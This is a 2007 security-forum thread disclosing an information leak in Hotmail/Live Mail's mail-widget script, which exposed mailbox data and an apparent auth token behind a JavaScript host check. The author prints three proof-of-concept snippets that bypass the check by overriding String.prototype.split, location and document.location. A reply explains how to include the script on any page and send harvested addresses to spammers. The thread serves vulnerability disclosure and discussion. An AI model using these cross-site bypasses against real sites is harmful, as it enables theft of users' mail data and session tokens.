Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Hotmail/Live Mail Information Disclosure vulnerability
Posted by: trev
Date: March 16, 2007 07:26PM

I discovered this hole in Hotmail/Live Mail over a month ago. The service is still not back up but I think I left Microsoft developers more than enough time. Interestingly, it is very similar to what Jeremiah Grossman found on Gmail a year ago.

The problem is this script: [www.hotmail.msn.com]. It is used on my.msn.com and live.com to display the mail widget - whether you have any new mails and similar information. Guess where this data came from? Right, from just that script, with a constant URL. The file started with something like this:

var iError = 0;
var strBaseURL = "http://by101fd.bay101.hotmail.msn.com/cgi-bin/sbox?";
var strGeoURL = "http://by101fd.bay101.hotmail.msn.com/cgi-bin/mymsn/mymsn.js?";	
var isFeatureOn = 1;
var iMaxMsgs = 10;
var strCurmbox = "curmbox=";
var strA = "a=";
var iStorageState = 1;
var iPercentUsed = 1;
var iMailboxSize = 0;
var iInboxTotal = 1;
var iNewInbox = 1;
var bIsNewMail = false;
var AmIDone = 0;
var iMsgsNum = 0;
var iMaxMailBoxSize = 2048000;
var aInboxView = new Array();

This is the information that anybody could access - guess this mailbox info wasn't worth protecting. But now comes the interesting part, namely the "protection":

var domains="www.msn.com|my.msn.com|t.msn.com|...another 100 host names";
var isValidDomain = false;
var domainsArray = domains.split("|");
for(i=0; i < domainsArray.length; i++)
{
if (window.location.host == domainsArray[i])
{
isValidDomain = true;
break;
}
}
if (isValidDomain)
{

It is followed by the really sensitive data that only the selected hosts are supposed to access:

bIsNewMail = 1;
strCurmbox	+= "00000000%2d0000%2d0000%2d0000%2d000000000001";
strA		+= "64f3b16907a2bbe2f9a52fee834b031ad624572b784e892b...";
strBaseURL	+= ("" + strCurmbox + "&" );
strGeoURL	+= ("" + strCurmbox + "&" + strA);
aInboxView[iMsgsNum++] = new objMsg("Smart Ways to Get the Most from MSN Hotma", "staff@hotmail.com", "Hotmail Staff", new Date(2007,1,08,13,28,21), 174, (strBaseURL+"rru=getmsg%3fcurmbox%3d00000000%252d0000%252d0000..."), new objIcon(1,0,0,0,3,0) );
AmIDone = 1;

Note that strA is apparently the authentication token that will allow you to do just about anything with the mail account. So all you need is to work around the protection. My first idea:

<script>
  String.prototype.split = function() {
    return [location.host];
  }
</script>
<script src="http://www.hotmail.msn.com/cgi-bin/mymsn/mymsn.js"></script>

All of a sudden we are in the list of allowed hosts, at least with Opera or Firefox - Internet Explorer doesn't support changing String.prototype. That's the PoC I sent to Microsoft. The response: "we will eliminate using intrinsic javascript methods and replace it with a direct equality test". And they really did it, replaced the check with:

if (location.host == "www.msn.com" || location.host == "my.msn.com" || ...) {

My answer to this was that while I understand their attempts to solve this with little effort they won't come around making the location of this script dynamic (if they want to keep it). Next PoC:

var location = {host: "whatever you want", toString: function() {return this.host}};
var window = {location: location};

alert(window.location.host);
alert(window.location);
alert(location.host);

Yep, you can make location.host be whatever you want. But this time in Internet Explorer and Opera, Firefox protects window and location from being overwritten. The response to that was: "We are exploring moving for the short-term to the document.location property (instead of the global location property). While we are still testing this, it appears all attempts to override it are ignored." I started to feel ridiculous. This took me no more than two minutes:

var document = {location: {href: "test", toString: function() {return this.href}}};
alert(document.location);
alert(document.location.href);
alert(window.document.location);

And that's when the script finally went offline, one month ago. I don't know the plan but I hope it involves making the address of this script dynamic.



Edited 1 time(s). Last edit at 03/16/2007 07:31PM by trev.

Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: kuza55
Date: March 17, 2007 07:17AM

Nice find, :)

Do you know of any way to solve the issue? Any way to reset the declarations for those objects/variables/functions? Because if there is, then Microsoft's idea could be quite an efficient way to allow restricted cross site communications.

Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: trev
Date: March 17, 2007 07:45AM

I don't think there is. JavaScript is a highly dynamic language, you cannot rely on anything. You probably could access the window object using the "this" variable - it doesn't look like it can be manipulated. But then you need "this.location" and that one is easily overridden with a global variable called location. You probably could test whether it has been tampered with using this.hasOwnProperty("location") but IE doesn't support the hasOwnProperty method. And even in Firefox hasOwnProperty is easily overridden.

Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: jungsonn
Date: March 20, 2007 03:29PM

Trev; pretty advanced one, looks very nice!

My question: is this accessible through a URI? Or does it require modification through headers and such? Or: is it easy to exploit? I viewed the code but can't find an entry where I could abuse it remotely.

Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: trev
Date: March 20, 2007 07:13PM

Jungsonn, you exploit it by including this script into any web page, see the code after "my first idea". After that you can put your own script that will read the variables set by mymsn.js and send the email addresses to a spammer's database for example.

Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: jungsonn
Date: March 20, 2007 07:40PM

That sounds cool. I read it a little more closely now and understand what you mean.

Wow, it's amazing they were so oblivious about JavaScript's power to overwrite certain set features.



Edited 1 time(s). Last edit at 03/20/2007 07:40PM by jungsonn.
